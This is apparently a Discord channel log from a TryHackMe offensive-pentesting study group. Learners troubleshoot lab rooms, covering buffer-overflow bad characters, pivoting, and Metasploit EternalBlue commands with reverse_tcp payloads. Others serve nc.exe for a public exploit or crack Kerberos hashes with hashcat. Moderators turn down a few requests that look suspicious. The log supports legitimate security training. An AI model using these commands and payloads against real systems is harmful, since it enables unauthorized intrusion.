#offensive-pentesting-path
it also could be it had another badchar from a Python script I did
since I didn't terminate the machine that I got a shell on
\x00\x16\x2f\x30\xf4\xfd
if there's any difference
not this way
but I still got a shell with \x30
yeah, it does work many times
I'm going to try manually
btw if \x2F is your badchar, it is likely to affect the next byte, i.e. \x30
so we are supposed to ignore it anyway
yeah, that's my fault ngl
so, was it the same?
gotta memorize the number patterns if I wanna use mona
yeah it would've been the same
great then! 🙂
actually do you know where I could find a normal hex dump picture
like for all values with no badchars
I'll share
or I could just be extra safe and use mona/check the hex dump also
yeah, for me it's best to manually inspect...and then match the result with mona's output
so what did you mean here?
wait, do you need those badchars or not😆
nah, I just realized that's the format of the hexdump
so I can check against that to see if any bytes are corrupted
yeah, got it then😆
np❤️
is it like compulsory to have prior coding experience to learn ethical hacking?
try some beginner rooms on TryHackMe and find out!
the short answer is no
the longer answer is: if you want to be efficient, you will learn as you go along to be able to at the very least read, understand and modify scripts and other code, but just stick with the beginner materials and you will see what it's like
ok thx
??
Why? What server?
I have a server which I don't have admin on, and it is taking up too much space on my Discord app, so I want to delete it.
Leave the server
no, I don't want to leave, I want to delete it
it is
Then you have admin
on my other Discord account, which I don't know the password to
We cannot help you as that would be illegal
ok
Recover your discord account through the forgotten password system
ok
Just leave the server.
In what context?
That doesn't really provide context
like for discord servers
when you "nuke" a server?
my friend was just talking about it
I'm sure you can answer that question for yourself with Google
@vagrant vapor It involves getting high permissions then running a script to delete every single channel, role, and banning all the users.
oh
You can just delete the server
You could.
hey guys, how do I connect to the Corp room? Remmina and xfreerdp can't connect. In the browser I can't reach cmd because Start can't be opened.
@velvet tapir thanks for the reply, but it didn't help
hi guys, I need some help with the BOF prep room
I did not understand how to identify the bad chars correctly
eh.. I wasn't familiar with what a domain name is
hey, this should help https://www.youtube.com/watch?v=uIFYNVqpZ0k&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=6
https://tcm-sec.com/2019/05/25/buffer-overflows-made-easy/
This video covers how to find the find bad characters in a buffer overflow process. We will examine the ESP dump and learn what bad characters look like, how they interact with shellcode, and their importance.
Is it just me or is the Hydra syntax in Hack Park just overkill and.. it seems like Hydra isn't the right tool here. They also didn't really give you much to go off of and you'd be hard-pressed to get the right answer without looking at writeups
I quite liked it and it forced me to learn more about crafting the correct formula and got better at hydra as a result
it did take me a bit to get right however
not specifically; the main benefit would be if you struggle with things and need help, more people use Kali and can offer specific advice, but in general terms it should not pose any real problem
Yep
@deep crest yes Friend.
how much time did it take you guys to finish any paths in tryhackme?
Hi guys, anyone here do the Offensive Pentesting > Buffer Overflow Exploitation > Buffer Overflow Prep ?
where can I find the "EIP contains normal pattern : ... (offset XXXX)" line in the attached logs?
why does my Jenkins command keep failing in Alfred?
0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 2400
0BADF00D [+] Looking for cyclic pattern in memory
750C0000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x018bf272 (length 2400 bytes)
0BADF00D Cyclic pattern (normal) found at 0x007e394a (length 2400 bytes)
0BADF00D Cyclic pattern (normal) found at 0x007e4d7a (length 2400 bytes)
0BADF00D [+] Examining registers
on this line...
so sorry that I am so blind with this topic. Maybe I should start other training about how to use the software. How can I expand those [+]?
you can't; your screenshot is kind of blurry, but after you run your distance command, right below that line you will see the offset
Hello, is there anyone who can guide me on which protocol is used by a port scanner or analyzer? I already know what a port scanner and ports are. I'm interested
in the protocol: how a port scanner like Nmap communicates with a target machine and gets information. Btw I'm supposed to write a protocol for this from scratch.
Read up about the TCP/IP 3 way handshake
Nmap is very well documented
You won't be writing a protocol for it, you'll be writing a program for it.
Actually it's my assignment, just for learning. I have to design a proper format just like any other protocol follows.
"I'm interested in the protocol: how a port scanner like Nmap communicates with a target machine and gets information." This protocol is just TCP
Yes, I have checked that but not in much detail. I have not found a proper format for a protocol, but yes, I have found the TCP 3-way handshake, UDP, TCP; these are transport layer protocols.
Ahan that's helpful bro.
Please don't call me bro
okay.
You would not be writing a protocol for port scanning, the protocol is already there (TCP)
Yes, I have understood this thing. But what if I just want to analyze how they communicate for this purpose? Am I supposed to read about TCP in depth?
You just need to understand the 3 way handshake and then you have understood TCP port scanning really
Got it mate. Thanks for helping.
Best way to understand it imo is to first learn about the theory behind the handshake etc., familiarize yourself with the protocol and then use a network capturing tool like wireshark (or tcpdump etc.) and look at the actual traffic between the target and your host. Really take your time with this!
@shell quartz Yes, exactly, this is what I'm doing: using Nmap and capturing the traffic using Wireshark. Thanks buddy. I'll be back if I get stuck somewhere.
Linux+ in 4 days : /
Just started maybe a week ago and I just finished Steelmountain. So maybe halfway ish through?
But I am also taking notes on github for new material
thank you, i will check it right now
Np❤️
Hello, I'm on the Vulnversity room, and I am not sure how to identify which port the web server is running on.
Try nmap
I did. I am just not exactly sure where on the scan it tells me it's running a webserver
Try the -sV flag to try to identify services
Oh okay, gotcha. Thanks
Hi all !!
Anyone available for a question about the buffer overflow prep channel ??
For OVERFLOW2, I'm confused about the shellcode's place in the payload. For instance, I know that 630 is the offset, next the 4 bytes for EIP, and after that I can see that there are only 265 bytes of space available
Don't worry, I've just figured out what I was doing wrong
It should be enough to enumerate open ports without further information. Even if the webserver runs on a non-standard port, you can simply try communicating with all the open ports (ip:port) using the http protocol and see if it serves you anything.
For myself a lot more than the hours predicted on the front page of the paths. But I take a lot of notes also, that counts for a lot of time.
I find myself adding time to the machines for the same reason of taking notes, along with other life happenings.
dog always needs to be taken out,
Has anyone felt industry ready after using tryhackme for a while?
Not TryHackMe alone
what else would you recommend? If you did every room in THM, that's a lot of knowledge. I did Cybrary for 100 hours then came over to THM.
I was thinking of the OSCP free course, said that then went and looked; not so easy to find. Found the Kali and Metasploit ones, but not the OSCP (free course). I guess people mean the syllabus.
Any good buffer overflow rooms to do before the oscp bof prep room?
Hello guys, I have questions about buffer overflow
I have this scenario: [Attacker -> Target1 -> Target2] and a BoF exists on Target2.
Target1 and Target2 are on different subnets and good pivoting is already set up on the msf of Target1 (proxychains and autoroute)
My questions:
1- should I use proxychains ./exploit_4_the_BoF.py to test my BoF exploit from the Attacker machine?
2- Should I change anything in the Python code "exploit_4_the_BoF.py":
import socket
ip = "Target2_IP"
port = Port
......
I don’t think that’s an option. You can however subscribe, and immediately cancel. You’ll remain subbed for the month and won’t be billed the following month. I’ve done this before.
Thank you
Another option is to buy a voucher: https://tryhackme.com/subscriptions @lyric glacier
ok thanks
but why isn't there a PayPal option on vouchers while there is on the normal subscription?
^^ @covert scarab
Honestly not sure :(
hello guys, I am stuck at the Brainstorm room. I already have the chatserver.exe but when I try to open it in Immunity it shows an error (chatserver is probably not a 32-bit executable) and I am unable to run it
Make sure you downloaded it from the FTP server in binary mode
did we download the wrong version of Windows 7?
I did,
but I'll do it again,
that took a few hours to set up: did Windows 7 64-bit, Immunity Debugger, and upgraded Python to 2.7.14. The main issue, other than the file giving an error, is my limited 8 GB of RAM, so it's almost impossible to run Windows 10 / Kali / and Windows 7
can't seem to communicate between my Kali and Windows 7. When I did nmap from Kali (assuming I had the right IP) it showed them all but 9999; seems like both boxes are sharing the same IP???
So I can see port 9999 from my Windows 10 but not from my Kali box. Any ideas?
I finished Daily Bugle, but when trying to privesc to ||jjameson|| the ||config file in /var/www/html|| wasn't picked up by linpeas // other enum scripts like it was supposed to be for some reason. Did they change the room so it doesn't work like that anymore, or is linpeas broken?
ok yeah, linpeas is just broken when it comes to checking for ||php configs|| and other scripts like linenum/lse don't hit either (probably because they don't look? didn't check)
is the procedure for getting this fixed submitting a GitHub issue or something? Don't really know what to do (esp. since I don't know how to fix it myself really...)
So this Offensive Pentesting path is conducive to a certification in particular? I've seen references to OSCP but I'm not sure how far or close we are from it at the completion of this (awesome) TryHackMe path
Hi, for "Relevant" room, Im trying to privesc, but my JuicyPotato.exe keeps getting deleted inside the machine. I ruled out AV because in that same dir, I have a msfvenom payload
Any idea whats going on?^
Quick question about Windows reverse shells. I have a simple tcp reverse shell running, from this, I’m unable to execute powershell commands nor can I switch to powershell. (It just hangs and does nothing). I tried multiple ways. What could be the reason for this? Tell me if you need more information. EDIT: I already considered execution policy
Hello guys, I have these questions on pivoting:
Question 1: In case the pivot target doesn't have SSH enabled and the SSH port is not open, and also Metasploit is not allowed on the attacker machine:
- What are the best open source pivoting tools we can use, not only to access a certain port on the third target but also to scan the entire network of the third target (similar to
proxychains nmap -sT 10.10.10.10)? Some links I followed, but none of them gave me the solution:
https://orangecyberdefense.com/fr/insights/blog/ethical_hacking/etat-de-lart-du-pivoting-reseau-en-2019/
https://roberthosborne.com/pivoting-proxies
https://nullsweep.com/pivot-cheatsheet-for-pentesters/
Question 2: How can we manually set up all the configuration on a pivot target instead of using "run autoroute 10.10.10.10" in msf?
Question 3: I am using the "multi/http/php_cgi_arg_injection" exploit with the payload "php/meterpreter/reverse_tcp" to exploit an httpd service.
Exploitation succeeds, but the problem is that whatever I type in the meterpreter session from the CLI, like whoami, an error message pops up: "command not found".
- So, what can the problem be?
- Some links I followed where they face the same issue:
https://www.youtube.com/watch?v=r4HqXu5mHuA&t=169s
https://medium.com/hacker-toolbelt/metasploitable-2-iv-port-80-5b90a0a22cb6
- Chisel is good. If you have an SSH client installed on the target then you can still use SSH to pivot with a reverse proxy.
- No idea
- Meterpreter commands are not the same as shell commands. You can drop into a shell with the shell command.
thanks a lot; the SSH client is not installed on the target so Chisel is not useful in my case, and 3. even the shell command is not found.
Chisel will be useful
Chisel is not dependent on SSH
I recommend completing Wreath. It will teach you a lot of different pivoting methods.
Yeah yeah, for sure, Chisel has some limits because you can't use it to scan an external network like proxychains with nmap. Correct me if I'm wrong please
Hey, I am looking for a room that will teach me to use docker for privilege escalation, but could not find one. Is there such a room or do I have to check for other sources?
@charred cedar Something like this: https://tryhackme.com/room/dockerrodeo
thanks!
Oh I just found out that there is a search function on tryhackme 😅 Well that will at least prevent future questions by me regarding stuff like that
I think THM is loading slow
Hi everyone, I'm at "Attacktive Directory", and one of the questions say "What tool will allow us to enumerate port 139/445?"
It doesn't recognize the tools I've used to enumerate SMB
I already completed the room, but I'm stuck with this question. Not sure what it's expecting me to type in 🤔
Nevermind 🤦♂️
Hi guys, when I enter the command airodump-ng wlan0, it isn't displaying the list of networks available. The chipset used in my wifi adapter is Ralink and the name of the adapter is Leoxsys LEO-HG150N. Please help me, thanks
Please ask in #infosec-general
👍🏼
Can anyone share some alternative ways to root the “Relevant” box with me pls? The path I used was pretty obvious, spending more time with the box, I’m struggling to find another way.
Hi, I'm querying info with Bloodhound, but it froze my VM. I have allocated 2 cores and 4 GB ram. Is that low? I can't find PC system requirements for Bloodhound in the Docs
(I'm using a Parrot OS as an attack box)
Hello, is there any way to get a regular command prompt with Evil-WinRM ? When I try, it immediately swap back to the powershell. Just curious
I am a newbie, any ideas where I can start?
Check out #start-here
I did and I found myself here
it said I can get help in one of these paths
To be a little more specific, it says help with rooms on those paths
Rooms, and the paths, are a feature of TryHackMe.
This discord server is the community for TryHackMe.com
TryHackMe is a platform for learning and teaching cybersecurity.
oh right, I looked at the first room and it said install a VPN
and other directions which I didn't understand
Yeah, you'll either need to set up the TryHackMe VPN or use the TryHackMe attack box in order to communicate with the target machines you deploy
If you're hacking a machine. you need a target and a machine to attack from
Im having issues with the Brainstorm room. The chatserver executable crashes instantly when ran. I've tried win 7,8, and 10 vms both 32 and 64bit. When opened with Immunity Debugger, the executable just hangs. Any help?
Answered in #site-support
hi all, why that "16" in nmap -sn 172.16.0.0/"16"? I'm afraid I don't understand why exactly 16...
That is the CIDR notation, in which an address or routing prefix is written with a suffix indicating the number of bits of the prefix, such as 192.0.2.0/24. This would be 24 bits to specify the network, leaving 8 bits to specify/identify the host. You could start reading about subnet masks and their purpose and eventually you will understand it, its not difficult.
Hello guys, I'm just getting into this thing, and I wanted a little clarification. So I'm currently doing the Skynet room in this path and the machine keeps crashing on me or something like that. It goes unresponsive... kind of in cycles... I got pretty far but it bothers the hell out of me that it freezes and I have to carefully wait till it comes back up and try stuff... Is it ok and I just have to power through it, or is something wrong and I should try this room later?
Sounds like a VPN issue rather than a room issue
hm I tried to switch the vpn from vip eu to vip eu 2 still no luck
but thank you, ill look into it
how much RAM are you giving your Kali box? Are you using the attack box or OpenVPN? Sounds to me like your VM doesn't have enough RAM allocated to it.
@velvet tapir Hello me
ohhh lol
🙂
Hey there, I'm trying to gain access to the Windows machine in the room "Blue", but when in Metasploit I keep failing on "Triggering free of corrupted buffer." I have tried a lot of times, not all in the same session, but it never completes. Any help?
so for the buffer overflow setup, am I supposed to run a Windows VM inside my Kali box?
sounds like options or payload not correct, what payload are you using?
I have been using "windows/x64/shell/reverse_tcp" and every so often, I have tried "windows/x64/meterpreter/reverse_tcp".
wrong payload
What payload am I supposed to be using, since the room says: "set payload windows/x64/shell/reverse_tcp"
Yeah, that is what I have been using most of the time, and every so often, I have tried meterpreter
Even meterpreter gets the same error though
do you have all your options correct?
I think so
so you have a meterpreter prompt?
not right now; I was trying it earlier, and the machine kind of just died off. I can pull it up now though
Hi anyone doing https://tryhackme.com/room/attackingkerberos ?
if you got to meterpreter that's pretty much it,
Well, what I do is:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS (machine IP)
set payload windows/x64/shell/reverse_tcp
That is what It says in the room
and with "set payload windows/x64/meterpreter/reverse_tcp" it does almost the exact same thing, and still just fails on "Triggering free of corrupted buffer."
And from what I have read, it says that it does fail quite often, but I've done it a lot of times, and it still hasn't worked
my q got drowned lol, everything looks good, I'm going to fire up that room, curious now
Okay, thanks :p
Needs to be your tryhackme VPN IP
so if my question gets drowned up there can I repost it? ?
That's one way of doing it
so for the buffer overflow setup, am I supposed to run a Windows VM inside my Kali box?
so Windows 10 running Oracle VM with Kali and Windows 7 as boxes; open both and can't ping VM (Kali) => VM (Win7). I can ping (Win7) from the host (Windows 10) but not VM to VM.
will this setup work?
Virtualbox, I recommend making a NAT Network and putting kali and windows on it
the standard NAT means the VMs aren't on the same network
ohh, I was trying to separate them... NAT and NAT1
But... you wanted to communicate between them?
yes, let me try putting them on the same NAT network, makes much sense. I was already trying to put a VM on my Kali box, but I think with my limited 8 GB I would be better off running two boxes with 2 GB each
thank you @keen iris
Don't do nested VMs
ohh ok, so the setup of running both boxes under one VM manager is the preferred way; just the boxes were not on the same network
omg finally... yes
is anyone available who has done the buffer overflow prep room? Can you help me understand something in the finding bad chars section?
hi all, I'm at the Network Services room, task 4 (exploiting SMB). I think I did everything, but when I try the SSH it demands the password. How can I find it? (I did the chmod 600 as it says and I've seen the user, but it demands the password.) I am a little lost with it.
sorry, done, with the -i flag...
You are probably stumbling over the fact that bytes appear to be bad because they get affected by the byte before? So if two consecutive bytes appear to be bad, you can either just exclude both or remove the first one from your payload and then check again if the second still appears to be bad. I always check this manually, I guess mona could make it easier as explained in the room I think, I prefer using my eye-sight.
show your command
As dombg said, if there are two badchars consecutively it is quite likely the first char has modified both, so I normally exclude the first char from all consecutive pairs and retry to see if any of the second chars were also bad. If you have some other query, I did this room recently so I might be able to answer
hey guys, yeah that was what I was confused over. In the Tiberius video where he follows along he kind of "skips" a step which confused me, but I kept watching and he basically said it's better to check each badchar one by one, which made it easier for me. Thank you
any best tool for penetrating Android?
don't give Metasploit
I don't remember it, but it also used TheFatRat
and then an Apache server opens
where the data is dumped, I guess
anyone?
That sounds pretty dodgy, whats the intent?
I'm penetrating my phone only.....
well, I'm good with Windows penetration, just learning Android
As a new username we can't verify your intent so I can't really help you I'm afraid.
c'mon, I'm just learning
When someone joins and immediately asks sketchy questions we try to tread lightly.
so you are asking me to say hi, hello first? idk how this will help in my learning
I just had a doubt so I asked?
!
anyone?
I'm sorry, I got what I wanted
noice
I'm new to THM so maybe this is a silly question, but I'm stuck on BurpSuite. I'm running through the Proxy section and I've started the machine; I'm not using the OpenVPN, just the machine that has everything already, as recommended. I am on the step where you are in the Intercept section and you enable it and open the browser, but I get an error: Net.portswigger.devtools.client aj: Refusing to start browser as your current configuration does not support running without sandbox.. Anyone know how to fix this?
how do you get a meterpreter from a payload without them clicking it
What's your goal here?
is there a way?
i would just like to know
For what purpose?
👀
anyone know of any good tutorials/articles for port forwarding? 🙂
well, I'm not at that room at the moment, but it was just that I forgot the -i flag, it's already resolved 😉
Hi guys
I've recently subscribed to THM and was doing the Offensive Pentesting path, and I am stuck in the Game Zone room
I can't get a reverse shell. Can anyone help!
If a reverse shell isn’t working, maybe it’s not the path. Keep enumerating versions and check exploitDB.
I got the root flag by exploiting Webmin 1.580
Simply using navigation from url
But I wanted to get a shell
Ah, the other website…. I’ll have to take a look back at the notes to see what I did. Check the ports you’re connecting back to, may be blocked outbound.
Okay
Hi, I'm at "Corp" and when I try to rdp into the machine, the window goes pitch black
The rdp window I mean. And then nothing, I have a black screen
Just realised I did brainpan in a completely unnecessary harder route 🤦
If its for pivoting: https://youtu.be/DQ7GA92Eewo
Question on GameZone. On the last task for using the MSF/ exploit and I am getting an Authentication failed error. But I've setup the payload/rhost/lhosts etc correctly. Has anyone else gotten that error before on this box?
Type options, double check
Should be RHOSTS and LHOST
Not RHOST and LHOSTS
Just checked and its labeled as the top
spoke too soon
:slaps forhead: got in
I did the same thing but couldn't get a connection
Is your SSH running? Make sure you are still logged in as the regular user then re-run the MSF exploit
Yep I was and I also wanted to do it manually but that also didn't work
hello im new here hope we can help each other
thank you
can someone teach me about html?
Take a look at this walkthrough, they give a good way to do it manually: https://ratiros01.medium.com/tryhackme-game-zone-b41874804d4e
Thanks
Can I dm you? @fleet wedge
Yeah shoot away
huh?
@edgy current This channel is for the THM path.
what do you mean exactly? Sorry, I'm a beginner.
and what channel should I ask for help regarding that then?
no I asked in #quiet-conversation and here.
I will be honest, kinda sketchy anyway so we'd prefer it wasn't here.
I know it will sound sketchy, but I just wanted to know where exactly I could ask for help (if somebody would be willing to). So should I message in #infosec-general ?
ohh okay thanks for clarifying.
tho what is this channel exactly for? @keen iris
The offensive pentesting path on tryhackme
so I just logged in on THM, but this is my first time there. Is there a way that I can dm you, so that you can guide me? @keen iris
Not really
ok cool.
In the SteelMountain room: if we are using the attackbox it already has port 80 in use, so I changed the script to use http://<attackers_ip>:8080/nc.exe and opened a webserver using python3 -m http.server 8080. While running python 39161.py <Target IP> <Target Port>, I get the following error: " Don't forgot to change the Local IP address and Port number on the script"""
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("""[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script""")?" I think using server 8080 does not work as it is a comment. Any idea how to get past this?
I am using the attackbox
I did run python2 -m SimpleHTTPServer 8080, however the syntax error remains. Do I need to change the script apart from the local IP and port?
ok got it, I have to use python2 on the command as well: python2 exploit.py <target ip> <target port>. Thanks
I think the issue is that I am using the attackbox and it uses port 80. The script does not work if I use port 8080 since it requires port 80, and port 80 is being used. Any ideas?
basically what I am asking is: is there a way to run a webserver on port 80 on the attackbox?
as far as I'm aware, no, there isn't
so some rooms and exploits can only be done via VPN connections right?
you would either have to user your own VM or change the exploit code so it uses a different port, but I wouldn't have any idea how to do that
Thank you
np
You can edit the script
You can SSH into the attackbox, then kill the service
Port 80 is used for the fullscreen thing
thanks for the tip
is the offensive path based on the beginner path?
or is it safe to skip if you know how to use linux
You could do with knowing the basics of cybersec and webapp first
what does basics of cybersec include? i already know the basics about webapps i guess
I'd take a look and see what the beginner path covers, and if you're confident with those then see
No shame in deviating from the Offensive path if you want to learn more about something specific
yeah makes sense, thanks
I have two hidden IPs but I am not sure how to add them to the route table manually
could anyone help ?
Anyone done brainstorm or gatekeeper?
Question for gatekeeper:
Why doesn't enum4linux show me any shares but smbclient -L do?
Question for brainstorm:
I couldn't get chatserver.exe running no matter what. I transferred the file to a Windows VM and when I double-click on it, nothing happens. If I open and run it in Immunity Debugger, Immunity Debugger pauses almost immediately. (I'm running as an admin.) Please help
sudo route add
Make sure you download the files in binary mode from FTP
Thank you!!
hey, one of the tasks says to go over the burpsuite room if you don't know what it is/to set it up, but it seems to be locked for subscribers
what am i supposed to do
?
Get familiar with it another way?
Hi, in the Relevant room, what's the other way to the root? Tried to find it but no success. Thanks 🙂
OS:SCAN(V=7.91%E=4%D=5/31%OT=21%CT=1%CU=30362%PV=Y%DS=2%DC=I%G=Y%TM=60B517A
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=8)OPS(O1=M506ST11NW6%O2=M506ST11NW6%O
OS:3=M506NNT11NW6%O4=M506ST11NW6%O5=M506ST11NW6%O6=M506ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
I receive this when I run nmap -O and the machine ip on VulnUniversity room
is this normal?
I cant see the machine OS, can someone help me?
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
minutes ago I ran the same nmap -O ip and i received this message above and I just ran the command again
idk what is happening
linux
I know that it is, but it does not work; there are six * on it
thank you 👍
probably missing something dumb here, could I get a sanity check on the xfreerdp command? I can't find a working combination. This is for the post exploitation room
xfreerdp /u:Administrator /p:P@$$W0rd /v:<IP> /d:CONTROLLER
With some investigation it seems the error is due to bad creds? but I have cp them directly from given...
[14:26:24:560] [53182:53183] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[14:26:24:560] [53182:53183] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[14:26:24:560] [53182:53183] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[14:26:24:560] [53182:53183] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
I figured the above out, dollar signs in the pw were not escaped 🤦♂️
I am trying to install Immunity Debugger in my Kali machine using Wine for solving BOF rooms.
But it's not installing as Python 2.7.1 isn't in my machine. How can I do the installation?
try to see if it's compatible with any other python version
Hello, I am stuck in the module "Move That Shell"; it says "exploit completed but no session was created". I am using a Kali VM (bridged with Metasploitable2) and OpenVPN
LHOST is wrong
Lhost should be the Private IP of the Open vpn
Yes.
Hi everyone, i'm having this problem with msf "Unable to find accessible named pipe!" anyone has ever been through this on windows 8.1 pro
Is this related to a tryhackme room or the tryhackme offensive pentesting path?
offensive pentesting path
Ok, what room in the path?
At times I setup a python3 http.server when required in some rooms. Those webserver sometimes responds with 501 or 401 even when nothing was requested from this server
Is this strange or expected behavior?
do you have a screenshot?
usually it will display the requester address, if you are scanning the system with something else at the time it might be that hitting it
Just curious who else will make a request to a webserver running on attackbox? Or what service?
I closed the attackbox but will be on the lookout
Ahh ok makes sense. Thanks
Gave +1 Rep to @keen iris
"Complete Beginner"
ya almost
?
I know some basic Linux commands and C
I meant start the "Complete Beginner" Learning Path
Where is it?
There are multiple learning paths. If you are a complete beginner, start with that one.
Thank you so much
Gave +1 Rep to @radiant plaza
Hello, I am unable to install "Gobuster". I am using "sudo apt-get install gobuster", and it's failing with an error:
The following NEW packages will be installed:
gobuster
0 upgraded, 1 newly installed, 0 to remove and 32 not upgraded.
Need to get 2,019 kB of archives.
After this operation, 6,759 kB of additional disk space will be used.
Err:1 http://http.kali.org/kali kali-rolling/main amd64 gobuster amd64 3.0.1-0kali1
404 Not Found [IP: 192.99.200.113 80]
E: Failed to fetch http://http.kali.org/kali/pool/main/g/gobuster/gobuster_3.0.1-0kali1_amd64.deb 404 Not Found [IP: 192.99.200.113 80]
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing
maybe run apt-get update or try with --fix-missing
can anyone help me fixing this?
apt even tells you what to do
I tried, but it didn't work.
It can't find the deb file online. Try navigating to it on a browser and download it manually
In fact, just a thought, are you still connected to the VPN?
THM VPN doesn't touch your internet traffic
I can never connect to the Internet on my machine when I'm connected to the VPN..... I best get that checked out lol
Don't use the VPN manager. Use the command line.
Don't do this though.
Cool will try that. Thanks
Would anyone know any good rooms to do to prepare for the CEH practical?
@trim cloak If you have CEH syllabus - you can search for the matching THM rooms that way to keep on task.
How can I delete my browser history?
lol
😉 😏
guys anyone did the bof prep room here?
I did everything as explained, tried almost 10 different shellcodes
and I found the right bad chars
yet I cant get a shell
:(
You should verify every parameter of your exploit.py and your msfvenom command (right IP, right listener port) multiple times... There's no magic, you just have to be extremely careful at each step :/
which bof number are you struggling on ?
@lone gulch got it already
thanks for helping
my issue was in the payload's layout
Gave +1 Rep to @lone gulch
In the room Retro, why does the reverse PHP shell not work? Tried it on the 404 and as a plugin; it connects and then drops. This is the second room where this happens, just curious.
@velvet tapir Yeah, I had the same issue; the shell would vanish at each command.
But as far as I remember ||you can root this machine without getting a reverse shell||
I'm thinking a firewall, or something in the theme since it's a custom theme
looks like I am starting the path 🙂 Not a Noob, just passed eJPT! I know some Linux and networking
Using the nmap flag -n, what will it not resolve? (I don't understand the question)
The answer is in 3 stars (***)
found answers
Good Morning. In Vulnversity, I perform a nmap scan and port 3333 is not open. Any intel?
At a guess, you're scanning your own machine rather than the target
I will check. Thanks.
yey!!!! 100% done,
powershell room and corp room reminded me of when I was doing a react app and linking api to spotify, very glitchy
How to crack Kerberos hash? I get this error using hashcat.
SLMail Buffer Overflow
I am trying to set up the SLMail vulnerability via the Buffer Overflow room and am running into a problem: when I do the install as admin and restart the application, it kicks me out of my connection.
Steps I took:
(1) xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
(2) home network
(3) Opened vulnerable folder
(4) Run SLMail55_4433 as admin
(5) Go through the set-up process and only bind to the localhost IP address
(6) Then it asks me to restart the machine, and when I do I get kicked from the logon via xfreerdp
Is there a way to work around this? I use the attack machine provided online.
search for the mode.
the first 4 char is what you need
hashid -m
I use this command: "hashcat -m 13100 -a 0 hash.txt rockyou.txt"
It's Kerberos 5
How do I request support properly? I'm having an issue when I shouldn't.
Email support@tryhackme.com for official support
Hey Everyone, I am trying to set up an OpenVPN connection but when I try to download the VPN configuration files it gives me a 404 error. Is there somewhere else these are stored. Thanks!
This is probably more of a #site-support issue, but maybe try a different vpn server?
Ah good point I will try #site-support, thank you!
@knotty lily I was able to get the US East Regular to download, thank you.
Gave +1 Rep to @knotty lily
you're welcome!
I used to remove the "-a 0"; try it, that should work.
Okay
Can I ask a few questions about certifications here?
Ask in #cyber-and-careers. 🙂
Go to archives, there’s a link to a chat about it with slides
Thanks @velvet tapir
Gave +1 Rep to @velvet tapir
Thanks @quaint garnet
Rep cooldown. 
You're welcomed
+rep @quaint garnet
Gave +1 Rep to @quaint garnet
I'm on Gatekeeper and I can't run the file in my local Windows VM. The error is: "The code execution cannot proceed because VCRUNTIME140.dll was not found." I've gotten the file both with get and mget, and I've searched for that DLL file and cannot find it. I also spent 3 days trying to find a solution. I looked through all the walkthroughs (they don't have this problem and they don't need a DLL file) and I looked through all the Gatekeeper-related questions here, and nothing. This is my last box before completing this path :/
Hello, I am doing the Offensive Pentesting module. My machine does not match the machine in the video, and neither does the answer.
!docs verify
Follow these steps, and then please send an image showing what you mean
That's why I told you to follow the steps in the link.
!docs
Now I'm a subscriber
My virtual machine is not the same as the one in the video
You are scanning the AttackBox
Not the target machine
Where can I find the target machine?
Howdy. I need to grep port numbers out of an nmap scan for use as input elsewhere. Does anybody have a canned string that will do this, or can you recommend a script repository for such things?
If you run your nmap with -oG it dumps it in a more greppable format. grep open might be enough? Depends what you're looking for.
thank u, it works
Gave +1 Rep to @keen iris
Can anyone please tell me why it is not accepting my answer? It is -format only in the man page of JtR. Please help me out; here it is saying the answer is incorrect.
Thanks Buff. Nikto has a nice output format for metasploit to better narrow down exploits. That's even better
nikto -h www.target.com -format msf+
Hi, I am on the Internal machine and the website for the machine is down. I can't complete the course without the Internal website. Please advise. Thanks!
It's not down.
You need to add it to /etc/hosts as the room says.
Hi
bye
Room: https://tryhackme.com/room/bufferoverflowprep
Task: running of exploit (overflow 1)
Query: I created shellcode using msfvenom but I am getting an error when I concatenate the payload in the buffer; I'm getting TypeError: can only concatenate str (not "bytes") to str. When I try to perform casting, the payload doesn't work. I am using python3. Any idea what's going wrong? I tried appending in b"" format / without b"" / (<payload>) format; nothing is giving a shell.
Hi all, perhaps someone can tell me, when using Burp Suite and scanning for blocked file extensions, why this fails when following the steps in task 4 of Vulnversity?
Is it because of the . In the list?
Kinda.
Make sure payload encoding is disabled
Thanks will give that a try
Gave +1 Rep to @keen iris
